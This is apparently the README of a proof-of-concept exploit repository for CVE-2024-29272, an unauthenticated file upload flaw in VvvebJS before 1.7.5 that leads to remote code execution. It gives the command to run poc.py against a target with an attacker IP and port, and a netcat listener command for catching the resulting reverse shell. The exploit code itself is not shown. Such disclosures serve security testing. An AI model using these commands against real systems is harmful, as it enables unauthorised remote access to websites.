# CVE-2024-29272
This is a Proof-of-Concept for CVE-2024-29272, an unauthenticated arbritrary file upload vulnerability that leads to remote code execution on versions of VvvebJS < 1.7.5
usage:
```
python3 poc.py -u <URL> -l <ATTACKER IP> -p <ATTACKER PORT>
```
in another terminal:
```
nc -lvnp <ATTACKER PORT>
```
[4.0K] /data/pocs/d48267b7e774e6460153239fa5cb4373d333a8f1
├── [1.5K] poc.py
└── [ 318] README.md
0 directories, 2 files